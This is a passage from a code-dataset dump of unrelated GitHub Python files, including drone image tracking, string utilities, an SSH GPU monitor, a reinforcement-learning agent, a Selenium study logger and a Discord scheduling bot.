= np.uint8(Gg)\n\n feature_params = {\"maxCorners\": 4, \"qualityLevel\": 0.5, \"minDistance\": 30, \"blockSize\": 5} # tokutyoute kensyutu\n # 特徴点の上限数 # 閾値 (高いほど特徴点数は減る) # 特徴点間の距離 (近すぎる点は除外) \n p0 = cv2.goodFeaturesToTrack(G1, mask=None, **feature_params) \n #p0 = cv2.goodFeaturesToTrack(mask, 4, 0.5, 30) \n p0 = np.int0(p0)\n #print(p0)\n\n if len(p0) >= 4:\n # 特徴点をプロットして可視化\n for p in p0: #p0 x,y zahyou 3image_origin\n x,y = p.ravel() #p0 no youso wo bunkai\n cv2.circle(image_origin, (x, y), 5, (0, 255, 255) , -1)\n \n x0 = p0[:,:,0].ravel() #x zahyou \n y0 = p0[:,:,1].ravel() #y zahyou\n l1 = np.sqrt((x0[0])**2+(y0[0])**2)\n l2 = np.sqrt((x0[1])**2+(y0[1])**2)\n l3 = np.sqrt((x0[2])**2+(y0[2])**2)\n l4 = np.sqrt((x0[3])**2+(y0[3])**2)\n \n l = [l1, l2, l3, l4]\n \n a = [0]*4\n b = [0]*4\n nn = [0, 1, 2, 3]\n for i in range(len(l)):\n if l[i] == min(l):\n a[0] = x0[i]\n b[0] = y0[i]\n s = i\n nn.remove(s)\n j=0\n for j in nn:\n n=nn.copy()\n A = (b[0]-y0[j])/(a[0]-x0[j])\n B = b[0] - A*a[0]\n n.remove(j)\n C = A*x0[n[0]] + B\n D = A*x0[n[1]] + B\n if C - y0[n[0]] > 0 and D - y0[n[1]] < 0:\n a[1] = x0[n[0]]\n b[1] = y0[n[0]]\n a[3] = x0[n[1]]\n b[3] = y0[n[1]]\n a[2] = x0[j]\n b[2] = y0[j]\n break\n elif C -y0[n[0]] < 0 and D - y0[n[1]] > 0:\n a[3] = x0[n[0]]\n b[3] = y0[n[0]]\n a[1] = x0[n[1]]\n b[1] = y0[n[1]]\n a[2] = x0[j]\n b[2] = y0[j]\n break\n\n d1 = np.sqrt((a[0]-a[1])**2+(b[0]-b[1])**2)\n d2 = np.sqrt((a[1]-a[2])**2+(b[1]-b[2])**2)\n d3 = np.sqrt((a[2]-a[3])**2+(b[2]-b[3])**2)\n d4 = np.sqrt((a[3]-a[0])**2+(b[3]-b[0])**2)\n\n #s = (d1 + d2 + d3 + d4) / 2\n #Sh = np.sqrt((s-d1)*(s-d2)*(s-d3)*(s-d4))\n\n #s1 = (d1 + d4 + d5) / 2\n #Sh1 = np.sqrt(s1*(s1-d1)*(s1-d4)*(s1-d5))\n \n #s2 = (d2 + d3 + d5) / 2\n #Sh2 = np.sqrt(s2*(s2-d2)*(s2-d3)*(s2-d5))\n\n #SH = Sh1 + Sh2\n\n #Sg = abs((1/2)*((a[3]-a[0])*(b[1]-b[0])-(a[1]-a[0])*(b[3]-b[0])))+abs((1/2)*((a[1]-a[2])*(b[3]-b[2])-(a[3]-a[2])*(b[1]-b[2])))\n #Sw = cv2.countNonZero(G1)\n \n S1 = d1*d2\n S2 = d1*d4\n S3 = d3*d2\n S4 = d3*d4\n\n c1 = (a[0]+a[2])/2\n c2 = (b[0]+b[2])/2\n c11 = int(c1)\n c21 = int(c2)\n cv2.circle(image_origin, (c11, c21), 5, (0, 255, 255) , -1)\n\n #line1 = cv2.line(image_origin,(c11+100,c21-100),(c11+100,c21+100),1000)\n #line2 = cv2.line(image_origin,(c11+100,c21+100),(c11-100,c21+100),1000)\n #line3 = cv2.line(image_origin,(c11-100,c21+100),(c11-100,c21-100),1000)\n #line4 = cv2.line(image_origin,(c11+100,c21-100),(c11-100,c21-100),1000)\n\n cy = shape[0]/2\n cy1 = shape[0]/3\n cx = shape[1]/2\n\n cv2.circle(image_origin, (int(cx), int(cy)), 5, (0, 255, 255) , -1)\n #with open(\"0.3m_S1_2020_10_17.txt\", \"a\") as f:\n # result = \"{:.7f}\\n\".format(S1)\n # f.write(result)\n\n #cv2.imshow('img_mask1', Gg) \n cv2.imshow('image_origin', image_origin)\n cv2.waitKey(1)\n \n if frame.time_base < 1.0/60:\n time_base = 1.0/60\n #print(\"T:\",time_base)\n #print(\"frame\",frame_skip)\n else:\n time_base = frame.time_base\n #print(\"T:\",time_base)\n # フレームスキップ値を算出\n frame_skip = (time.time() - start_time) / time_base\n #print(\"frame\",frame_skip)\n\n except Exception as ex:\n exc_type, exc_value, exc_traceback = sys.exc_info() # zikkoutyuuno sagyou no zyouhou teizi\n traceback.print_exception(exc_type, exc_value, exc_traceback) # zikkoukatei deno stuck frame no kiroku wo print\n print(ex)\n finally:\n drone.quit()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__' :\n main()\n","repo_name":"henrypom97/Urban-Delivery-Drone","sub_path":"control/dronegoodfeaturetrack.py","file_name":"dronegoodfeaturetrack.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72077019367","text":"def compress_string(s):\n \"\"\"\n Compress string. Return compression only if shorter than original string.\n\n >>> compress_string('aabb')\n 'aabb'\n\n >>> compress_string( \"aabbb\")\n 'a2b3'\n\n >>> compress_string(\"aabbbba\")\n 'a2b4a1'\n\n >>> compress_string(\"AAAaaaBBBbb\")\n 'A3a3B3b2'\n \"\"\"\n\n new_string = \"\"\n\n curr_char = None\n counter = 0\n\n\n for i in range(1, len(s)):\n if curr_char is None:\n curr_char = s[0]\n counter+=1\n if curr_char == s[i]:\n counter+=1\n else:\n new_string += (curr_char + str(counter))\n curr_char = s[i]\n counter = 1\n #accounts for the last letter after the loop ends\n if i == len(s)-1:\n new_string += (curr_char + str(counter))\n\n return s if len(new_string) >= len(s) else new_string","repo_name":"m-romberg/cracking-the-coding-interview","sub_path":"arrays-and-strings/1_6_string_compression.py","file_name":"1_6_string_compression.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13519309126","text":"if True:\n import datetime\n import pandas as pd\n #\n import python.build.people_3_income_taxish_functions as f4\n from python.common.misc import num_people\n import python.common.util as util\n import python.build.output_io as oio\n import python.common.common as com\n\n\ndef test_insert_claims_dependents_columns():\n d = pd.DataFrame(\n # This combines the input and the [expected] output data.\n { \"household\" : [1,1,1,1,1, 2,2,2,2,2, 3,3,3,3,3, 4,4, 5,5,5,5,5,5,5,5] ,\n \"dependent\" : [0,0,1,1,1, 0,0,0,1,1, 0,0,0,0,1, 0,0, 0,0,0,1,1,1,1,1] ,\n # whether someone is a depndent\n \"dependents\" : [3,3,3,3,3, 2,2,2,2,2, 1,1,1,1,1, 0,0, 5,5,5,5,5,5,5,5] ,\n # total number of dependents in household\n \"rank, labor income\" : [1,2,3,4,5, 1,2,3,4,5, 1,2,3,4,5, 1,2, 1,2,3,4,5,6,7,8] ,\n \"dependents to claim (up to 4)\" : [3,0,0,0,0, 2,0,0,0,0, 1,0,0,0,0, 0,0, 4,1,0,0,0,0,0,0] ,\n # corresponds to a tax proposal active as of October 2022.\n \"claims dependent (labor income tax)\" : list( map( bool,\n # corresponds to the status quo as of May 2022.\n [1,1,0,0,0, 1,1,0,0,0, 1,0,0,0,0, 0,0, 1,1,1,0,0,0,0,0,] ) ) } )\n def rei( df: pd.DataFrame ) -> pd.DataFrame:\n return df . reindex( sorted(df.columns), axis=1)\n d_input = rei( d.drop( columns = [ \"dependents\",\n \"dependents to claim (up to 4)\",\n \"claims dependent (labor income tax)\",\n ] ) )\n d_intended_output = rei( d )\n d_output = rei( f4.insert_claims_dependents_columns( d_input ) )\n # return (d_input, d_intended_output, d_output)\n assert d_intended_output . equals( d_output )\n\nif True:\n log = str( datetime.datetime.now() )\n\n # unit tests\n test_insert_claims_dependents_columns()\n\n # integration tests\n p4 = oio.readUserData(\n com.subsample,\n 'people_3_income_taxish.' + com.strategy_year_suffix )\n assert util.near(\n len(p4),\n num_people / com.subsample,\n tol_frac = 1/5 )\n assert util.unique( p4.columns )\n assert ( ( p4 [\"tax, ss\"] >=\n p4 [\"tax, ss, total employee contribs\"] )\n . all () )\n\n oio.test_write( com.subsample\n , \"people_3_income_taxish\"\n , log )\n","repo_name":"ofiscal/tax.co","sub_path":"python/build/people_3_income_taxish_test.py","file_name":"people_3_income_taxish_test.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"169444483","text":"import functools\nclass Solution:\n def convert(self, s: str, numRows: int) -> str:\n \n if numRows == 1:\n return s\n ret = [[] for _ in range(numRows)]\n pattern = numRows*2 - 2\n for i in range(len(s)):\n if i % pattern < numRows:\n ret[i % pattern].append(s[i])\n else:\n ret[pattern - (i % pattern)].append(s[i])\n \n return functools.reduce(lambda a, b : a + b ,[''.join(c) for c in ret])\n \n \n","repo_name":"MingfeiPan/leetcode","sub_path":"string/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28825610875","text":"\"\"\"\n @Author Jay Lee\n A simple demo containing the creation of tmux sessions programatically and\n also writing a command on the remote session.\n The demo also involves extracting the gpu information from nvidia-based GPUs.\n\n I don't have non Nvidia-based GPUs so I wont be able to develop code for other GPUs\n until I get my hands on or access to such machines\n\"\"\"\n\nfrom excite import ssh\nfrom excite.cmd import Tmux\n\n\ndef common_commands(session_name, tasks=[]):\n \"\"\"\n Set of common commands when creating new session\n \"\"\"\n cmds = [\n Tmux.kill_session(session_name),\n Tmux.new_session(session_name),\n Tmux.attach(session_name),\n \"ls -l\",\n ]\n cmds.extend(tasks)\n cmds.append(Tmux.detach())\n return cmds\n\n\ndef print_gpu_info(server_manager):\n \"\"\"\n :param server_manager: Manager object containing a list\n of connections.\n :return:\n \"\"\"\n gpu_info = server_manager.gpu_info()\n space_count = 6\n\n # Print stats\n for server in gpu_info['servers']:\n print(server['name'])\n print(server['stats'])\n for gpu in server['gpu']:\n for key in gpu:\n print(f\"{key}:\\t {gpu[key]}.\")\n print(\"-\" * 30)\n\n # Print manager stats\n max_key = -1\n\n del gpu_info['servers']\n for stats_key in gpu_info.keys():\n max_key = max(max_key, len(stats_key))\n if stats_key == 'free_gpus':\n print(f\"Free GPU: \")\n for item in gpu_info[stats_key][:20]:\n print(f\"Server name: {item['name']}. GPU Index: {item['index']}. Free memory: {item['free_memory']}\")\n else:\n print(f\"{stats_key}:\", \" \" * (space_count + max_key - len(stats_key)), f\"{gpu_info[stats_key]}\")\n\n\nif __name__ == \"__main__\":\n port = 9999\n username = 'asdasdas'\n password = 'asdasd'\n\n # Server and session info\n servers = [f\"asdasd{i}.snu.ac.kr\" for i in range(1, 8)]\n tmux_session_names = [f\"tmux_session_names{i}\" for i in range(1, 8)]\n\n # Create the ssh connection objects.\n # Each connection represents an ssh connection to a server\n connections = ssh.create_connections(servers, username, password, port=port, is_debug=True)\n # Create sess\n manager = ssh.SshConnectionManager(connections)\n\n # Print GPU info:\n print_gpu_info(manager)\n\n print(manager[0].gpu_info())\n print(manager[1].gpu_info())\n print(manager.gpu_info())\n\n # For all the servers enlisted,\n # perform the simple commands\n # for i, connection in enumerate(manager):\n # # Print connection info\n # print(connection)\n # # Perform the following commands\n # connection.cmd(\n # [\n # Tmux.new_session(tmux_session_names[i]),\n # Tmux.ls(),\n # Tmux.detach()\n # ])\n","repo_name":"JWLee89/excite","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26378197767","text":"import collections\nimport os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom sklearn.utils import shuffle\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom .augment import WavAugment\n\ndef load_audio(filename, second=2):\n sample_rate, waveform = wavfile.read(filename)\n if second <= 0:\n return waveform\n\n length = np.int64(sample_rate * second)\n audio_length = waveform.shape[0]\n\n if audio_length <= length:\n shortage = length - audio_length\n waveform = np.pad(waveform, (0, shortage), 'wrap')\n return waveform\n else:\n start = np.int64(random.random()*(audio_length-length))\n return waveform[start:start+length].copy()\n\nclass Train_Dataset(Dataset):\n def __init__(self, train_csv_path, noise_csv_path, second, spk_utt=200, num_per_speaker=1, **kwargs):\n self.second = second\n\n df = pd.read_csv(train_csv_path)\n data_labels = df[\"utt_spk_int_labels\"].values\n data_paths = df[\"utt_paths\"].values\n data_labels, data_paths = shuffle(data_labels, data_paths)\n\n df = pd.read_csv(noise_csv_path)\n noise_paths = df[\"utt_paths\"].values\n self.wav_aug = WavAugment(noise_paths)\n\n table = {}\n for idx, label in enumerate(data_labels):\n if label not in table:\n table[label] = []\n table[label].append(data_paths[idx])\n\n self.labels = []\n self.paths = []\n for _ in range(spk_utt//num_per_speaker):\n for key, val in table.items():\n for _ in range(num_per_speaker):\n idx = random.randint(0, len(val)-1)\n self.labels.append(key)\n self.paths.append(val[idx])\n print(\"Train Dataset load {} speakers\".format(len(set(data_labels))))\n print(\"Train Dataset load {} utterance\".format(len(self.labels)))\n\n def __getitem__(self, index):\n waveform = load_audio(self.paths[index], self.second)\n\t\t#aug_idx = np.random.randint(0, 3)\n #if aug_idx == 1:\n # waveform = self.wav_aug.change_volum(waveform)\n #elif aug_idx == 2:\n # waveform = self.wav_aug.add_gaussian_noise(waveform)\n #elif aug_idx == 3:\n # waveform = self.wav_aug.add_real_noise(waveform)\n return torch.FloatTensor(waveform), self.labels[index]\n\n def __len__(self):\n return len(self.paths)\n\n\nclass Evaluation_Dataset(Dataset):\n def __init__(self, paths, second=-1, **kwargs):\n self.paths = paths\n self.second = second\n print(\"load {} utterance\".format(len(self.paths)))\n\n def __getitem__(self, index):\n waveform = load_audio(self.paths[index], self.second)\n return torch.FloatTensor(waveform), self.paths[index]\n\n def __len__(self):\n return len(self.paths)\n","repo_name":"thuhcsi/torch_speaker","sub_path":"torch_speaker/audio/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"31743115043","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.tensorboard import SummaryWriter\nimport numpy as np\n\nfrom src.Configuration.StaticConf import StaticConf\nfrom src.Model.Critic import Critic\nfrom src.Model.Actor import Actor\nfrom src.Model.ActorCritic import ActorCritic\nfrom src.NetworkEnv import NetworkEnv\nfrom src.PrioritizedReplay import PrioritizedReplayMemory\n\n\nclass A2C_Combined_Agent_Reinforce():\n # , experience_replay_size, priority_alpha, priority_beta_start, priority_beta_frames\n def __init__(self, models_path):\n # Hyper params:\n self.discount_factor = 0.9\n self.lr = 1e-3\n self.num_steps = 10\n self.device = StaticConf.getInstance().conf_values.device\n self.num_actions = StaticConf.getInstance().conf_values.num_actions\n self.num_episodes = 100\n self.episode_idx = 0\n\n self.actor_critic_model = ActorCritic(self.device, self.num_actions).to(self.device)\n self.optimizer = optim.Adam(self.actor_critic_model.parameters(), self.lr)\n\n self.env = NetworkEnv(models_path, StaticConf.getInstance().conf_values.can_do_more_then_one_loop)\n\n def compute_returns(self, next_value, rewards, masks, gamma=0.99):\n R = next_value\n returns = []\n for step in reversed(range(len(rewards))):\n R = rewards[step] + gamma * R * masks[step]\n returns.insert(0, R)\n return returns\n\n def train(self):\n writer = SummaryWriter()\n frame_idx = 0\n\n all_rewards_episodes = []\n max_reward_in_all_episodes = -np.inf\n reward_not_improving = False\n min_epochs = 100\n action_to_compression = StaticConf.getInstance().conf_values.action_to_compression_rate\n\n while self.episode_idx < min_epochs or (not reward_not_improving):\n print(\"Episode {}/{}\".format(self.episode_idx, self.num_episodes))\n state = self.env.reset()\n log_probs = []\n values = []\n rewards = []\n masks = []\n\n # rollout trajectory\n for _ in range(self.num_steps):\n dist, value = self.actor_critic_model(state)\n\n action = dist.sample()\n compression_rate = action_to_compression[action.cpu().numpy()[0]]\n next_state, reward, done = self.env.step(compression_rate)\n\n log_prob = dist.log_prob(action)\n\n log_probs.append(log_prob)\n values.append(value)\n rewards.append(torch.FloatTensor([reward]).unsqueeze(1).to(self.device))\n masks.append(torch.FloatTensor([1 - done]).unsqueeze(1).to(self.device))\n\n state = next_state\n\n if done:\n break\n\n writer.add_scalar('Total Reward in Episode', sum(rewards), self.episode_idx)\n self.episode_idx += 1\n # next_state = torch.FloatTensor(next_state).to(self.device)\n returns = self.compute_returns(0, rewards, masks)\n\n log_probs = torch.cat(log_probs)\n returns = torch.cat(returns).detach()\n values = torch.cat(values)\n\n advantage = returns - values\n\n actor_loss = -(log_probs * advantage.detach()).mean()\n critic_loss = advantage.pow(2).mean()\n\n writer.add_scalar('Actor Loss', v(actor_loss), self.episode_idx)\n writer.add_scalar('Critic Loss', v(critic_loss), self.episode_idx)\n\n # loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy\n # loss_val = loss.data.detach().cpu().numpy().min()\n # writer.add_scalar('Loss', loss_val, self.episode_idx)\n\n total_loss = actor_loss + critic_loss\n\n self.optimizer.zero_grad()\n total_loss.backward()\n self.optimizer.step()\n\n all_rewards_episodes.append(returns[-1])\n curr_reward = all_rewards_episodes[-1]\n\n if max_reward_in_all_episodes < v(curr_reward):\n max_reward_in_all_episodes = v(curr_reward)\n\n if len(all_rewards_episodes) > min_epochs and max_reward_in_all_episodes >= max(all_rewards_episodes[-20:]):\n reward_not_improving = True\n\ndef v(a):\n return a.data.detach().cpu().numpy().min()","repo_name":"liorhirsch/NEON-CopressionAgent","sub_path":"src/A2C_Combined_Agent_Reinforce.py","file_name":"A2C_Combined_Agent_Reinforce.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"29543329782","text":"from controllers import invocation_controller\nfrom flask import Blueprint, jsonify, request\nfrom flask_api import status\nimport logging\nimport traceback\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ninvocation_router = Blueprint(\"invocation_router\", __name__)\n\n# Controllers\nic = invocation_controller.InvocationController()\n\ndef __getStatusCode(response):\n if response[\"status\"] == 200:\n tmp_status = status.HTTP_200_OK\n elif response[\"status\"] == 400:\n tmp_status = status.HTTP_400_BAD_REQUEST\n elif response[\"status\"] == 401:\n tmp_status = status.HTTP_401_UNAUTHORIZED\n elif response[\"status\"] == 422:\n tmp_status = status.HTTP_200_OK\n elif response[\"status\"] == 500:\n tmp_status = status.HTTP_500_INTERNAL_SERVER_ERROR\n elif response[\"status\"] == 501:\n tmp_status = status.HTTP_501_NOT_IMPLEMENTED\n else:\n tmp_status = status.HTTP_500_INTERNAL_SERVER_ERROR\n return tmp_status\n\n@invocation_router.route(\"\", methods=['POST'])\ndef index():\n try:\n request_body = request.get_data()\n\n logger.info(\"Input: {}\".format(request_body))\n logger.info(\"type: {}\".format(type(request_body)))\n\n request_body = request_body.decode(\"utf-8\")\n\n results = []\n\n logger.info(\"Request: {}\".format(request_body))\n\n X = ic.input_handler(request_body)\n\n prediction = ic.predict_fn(X)\n\n results.append(ic.output_handler(prediction))\n\n return \",\".join(results)\n except Exception as e:\n stacktrace = traceback.format_exc()\n logger.error(\"{}\".format(stacktrace))\n\n raise e","repo_name":"brunopistone/sm-end-to-end-mlops","sub_path":"seed_code/01-ml-deploy/algorithms/inference-custom-container/src/routers/invocation_router.py","file_name":"invocation_router.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15508203711","text":"import sys\nimport normal\nimport auth\nimport messages\n\n\n\nclass registry:\n def __init__(self, app):\n self.app = app\n self._registry = {}\n self.noHandlers = set()\n self._is_alive = True\n\n def handleEvent(self, event):\n if event['@type'] not in self._registry:\n print('no handler for event type:', event['@type'])\n self.noHandlers.add(event['@type'])\n # handle an incoming update or an answer to a previously sent\n # request\n print(event)\n sys.stdout.flush()\n return\n self._call_handlers(event)\n\n def add_handler_class(self, handler):\n handler_instance = handler(self.app)\n if hasattr(handler, 'target') and handler.target:\n self._add_handler(handler.target, handler_instance)\n if hasattr(handler, 'targets') and handler.targets and isinstance(handler.targets, list):\n for t in handler.targets:\n self._add_handler(t, handler_instance)\n return handler_instance\n\n def _add_handler(self, name, handler_instance):\n if name not in self._registry:\n self._registry[name] = []\n self._registry[name].append(handler_instance)\n\n def _call_handlers(self, event):\n handlers = self._registry[event['@type']]\n for handler in handlers:\n handler.handle(event)\n\n def __del__(self):\n self._on_del()\n\n def _on_del(self):\n print('no handlers: ', self.noHandlers)\n \n def terminate(self):\n self._is_alive = False\n\n\ndef register_all(app):\n r = registry(app)\n r.add_handler_class(auth.handler)\n r.add_handler_class(normal.forget_handler)\n r.add_handler_class(normal.print_handler)\n # r.add_handler_class(messages.messages_handler)\n return r\n","repo_name":"wusisu/tg-client","sub_path":"registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732031207","text":"from selenium import webdriver\nfrom datetime import timedelta\nfrom user_info_screen import SimpleScreen\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\n\n\ndef formatVideoDuration(videoDuration):\n hourPlaces = \"\" if len(videoDuration) > 5 else \"00:\"\n videoDuration = f\"{hourPlaces}{videoDuration}\"\n return videoDuration.split(':')[::-1]\n\n\ndef clickBySelector(selector, seconds=1):\n sleep(seconds)\n element = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, selector)))\n element.click()\n\n\ndef getAllElementsByClassName(className, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, className)))\n\n\ndef getElementByID(elementID, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_element_located((By.ID, elementID)))\n\n\ndef getElementTextBySelector(selector, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, selector))).text\n\n\ndef sendTextOnElementById(elementID, text):\n driver.find_element_by_id(elementID).clear()\n driver.find_element_by_id(elementID).send_keys(text)\n\n\ndef createChromeInstanceWithAddBlock():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_extension(r\"C:\\Projects\\Python\\adblock.crx\")\n return webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n\n\nscreen = SimpleScreen()\nvideoURL, email, password, option = screen.openScreen()\nscreen.closeWindow()\n\ndriver = createChromeInstanceWithAddBlock()\nurl = videoURL\ndriver.get(url)\nwait = WebDriverWait(driver, 10)\n\nvideoTitle = getElementTextBySelector(\"h1.title.style-scope.ytd-video-primary-info-renderer\")\nvideoDuration = getElementTextBySelector(\"span.ytp-time-duration\")\n\ndriver.get(\"https://aprovadoapp.com/#\")\n\nclickBySelector(\"a.btn.btn-link.dropdown-toggle\")\n\nsendTextOnElementById('email', email)\nsendTextOnElementById('senha', password)\nclickBySelector(\".btn.btn-success.btnLogin.__tab-campo\")\n\nclickBySelector(\"ul.nav > li:nth-child(3)\") # Atividades\nclickBySelector(\"button.btn.btn-info.__tab-campo\") # Cadastrar Nova Atividade\nclickBySelector(\"div.btn-group > button\") # Escolher Materia\nclickBySelector(\"ul.dropdown-menu.dropMateria.__tab-campo > li:nth-child(4)\")\n\n# Escolher Conteudo\nclickBySelector(\"div.control-group:nth-child(3) > div.controls > div.btn-group > button\")\nclickBySelector(option)\n\nhora, minuto, segundo = getAllElementsByClassName(\"input.formDuracao\")\nsplitSegundo, splitMinuto, splitHora = formatVideoDuration(videoDuration)\nhora.send_keys(splitHora)\nminuto.send_keys(splitMinuto)\nsegundo.send_keys(splitSegundo)\n\nanotacoes = getElementByID(\"__atividade-cadasteditar-anotacoes\")\nanotacoes.send_keys(videoTitle)\nclickBySelector(\"button.btn.btn-success.__tab-campo\")\nsleep(2)\ndriver.quit()\n","repo_name":"gleisonkz/python-college-lessons","sub_path":"automate-post/selenium-test.py","file_name":"selenium-test.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237347016","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport json\r\nimport pandas as pd\r\nfrom datetime import date\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\nfrom dateutil import parser\r\n\r\nbot = commands.Bot(command_prefix= '%')\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('---------- SERVER HAS STARTED ---------')\r\n await bot.wait_until_ready()\r\n trigger.start()\r\n\r\n@tasks.loop(seconds = 45)\r\nasync def trigger():\r\n with open('Settings.json') as f:\r\n s = json.load(f)\r\n \r\n if not 'TIME' in s or not 'COMMAND' in s or not 'Channel' in s:\r\n return\r\n \r\n try:\r\n tm = s['TIME1']\r\n t1 = parser.parse(str(tm))\r\n t2 = parser.parse(str(datetime.now().strftime('%d/%m/%y %H:%M:%S')))\r\n t3 = t1 - t2\r\n t3 = round(t3.total_seconds())\r\n print(t3)\r\n if t3 <= 0:\r\n cmd = s['COMMAND']\r\n channel = await bot.fetch_channel(s['Channel'])\r\n msg = await channel.send(cmd)\r\n #await msg.delete()\r\n dt = datetime.strptime(tm, '%d/%m/%y %H:%M:%S')\r\n dt = dt + timedelta(days = 1)\r\n s['TIME1'] = str(dt)\r\n with open('Settings.json','w') as f:\r\n json.dump(s,f,indent = 3)\r\n\r\n tm = s['TIME2']\r\n t1 = parser.parse(str(tm))\r\n t2 = parser.parse(str(datetime.now().strftime('%d/%m/%y %H:%M:%S')))\r\n t3 = t1 - t2\r\n t3 = round(t3.total_seconds())\r\n print(t3)\r\n if t3 <= 0:\r\n cmd = s['COMMAND']\r\n channel = await bot.fetch_channel(s['Channel'])\r\n msg = await channel.send(cmd)\r\n #await msg.delete()\r\n dt = datetime.strptime(tm, '%d/%m/%y %H:%M:%S')\r\n dt = dt + timedelta(days = 1)\r\n s['TIME2'] = str(dt)\r\n with open('Settings.json','w') as f:\r\n json.dump(s,f,indent = 3)\r\n \r\n\r\n except Exception as e:\r\n print(e)\r\n return\r\n \r\n\r\n@bot.command()\r\nasync def setchannel(ctx,channel:discord.TextChannel = None):\r\n if not channel:\r\n await ctx.send(':information_source: Usage: !setchannel ``')\r\n return\r\n\r\n\r\n with open('Settings.json', 'r') as f:\r\n settings = json.load(f)\r\n\r\n settings['Channel'] = channel.id\r\n\r\n with open('Settings.json','w') as f:\r\n json.dump(settings,f,indent = 3)\r\n \r\n await ctx.send(':white_check_mark: Channel has been set') \r\n\r\n@bot.command()\r\nasync def settime(ctx,var1:str = None,var2:str = None):\r\n if not var1 or not var2:\r\n await ctx.send(':information_source: Usage: !settime `` `` `(EXAMPLE: 04:10 HH:MM)`')\r\n return\r\n \r\n if var2.count(':') > 1:\r\n await ctx.send(':warning: Invalid Format')\r\n return\r\n\r\n if var1.count(':') > 1:\r\n await ctx.send(':warning: Invalid Format')\r\n return\r\n\r\n with open('Settings.json', 'r') as f:\r\n settings = json.load(f)\r\n \r\n dt = datetime.now()\r\n a = pd.to_datetime(str(dt)+' '+ str(var1))\r\n a = a.strftime('%d/%m/%y %H:%M:%S')\r\n settings['TIME1'] = a\r\n dt = datetime.now()\r\n b = pd.to_datetime(str(dt)+' '+ str(var2))\r\n b = b.strftime('%d/%m/%y %H:%M:%S')\r\n settings['TIME2'] = b\r\n\r\n with open('Settings.json','w') as f:\r\n json.dump(settings,f,indent = 3)\r\n \r\n await ctx.send(':white_check_mark: Time has been set') \r\n \r\n@bot.command()\r\nasync def setcommand(ctx,*,var:str = None):\r\n if not var:\r\n await ctx.send(':information_source: Usage: !setcommand ``')\r\n return\r\n \r\n with open('Settings.json') as f:\r\n settings = json.load(f)\r\n \r\n settings['COMMAND'] = var\r\n\r\n with open('Settings.json','w') as f:\r\n json.dump(settings,f,indent = 3)\r\n \r\n await ctx.send(':white_check_mark: Command has been set')\r\n\r\nTOKEN = 'YOUR TOKEN HERE'\r\nbot.run(TOKEN)","repo_name":"karansharma002/Discord","sub_path":"DISCORD PING/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41988265074","text":"from pydantic import BaseModel\n\n\nclass FooBarModel(BaseModel):\n a: str\n b: dict\n\n class Config:\n allow_mutation = False\n\n\nfoobar = FooBarModel(a='hello', b={'apple': 'pear'})\n\ntry:\n foobar.a = 'different'\nexcept TypeError as e:\n print(e)\n\nprint(foobar.a)\nprint(foobar.b)\nfoobar.b['apple'] = 'grape'\nprint(foobar.b)\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/acceptance/subjects/pydantic/docs/examples/models_mutation.py","file_name":"models_mutation.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40098771417","text":"fps = 60\n\nYCells = 5\nXCells = 9\n\nsun_drop_delay = 10\nstarting_sun = 50\n\ntime_paint_white = fps / 6\ntime_repeater_second_shot = fps / 6\ntime_readySetPlant = (fps * 4 / 3, fps * 2 / 3, fps / 12)\ntime_afterRSP = fps * 5 / 3\n\npassive_plants = [\"WallNut\", \"PotatoMine\",\n \"Chomper\", \"CherryBomb\",\n \"Jalapeno\", \"Squash\"]\n\nsizes = {\n \"win\": (830, 623),\n \"topmenu\": (500, 100),\n \"cell\": (67, 